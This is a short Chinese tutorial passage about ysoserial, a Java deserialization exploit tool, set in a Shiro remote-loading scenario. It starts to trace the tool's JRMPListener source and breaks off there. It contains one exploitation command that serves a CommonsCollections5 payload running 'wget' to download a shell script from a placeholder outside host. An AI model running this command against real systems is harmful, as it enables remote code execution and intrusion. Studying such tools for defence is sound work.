反序列化漏洞利用神器:ysoserial
0x01 ysoserial 工具模块
我们以为shiro远程加载反序列化数据的利用场景为例:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test'
其中-cp指定了类路径为:
ysoserial.exploit.JRMPListener
打开ysoserial.exploit.JRMPListener,找到主函数:
其中 ObjectPayload.Utils.makePayloadObject方法具体实现: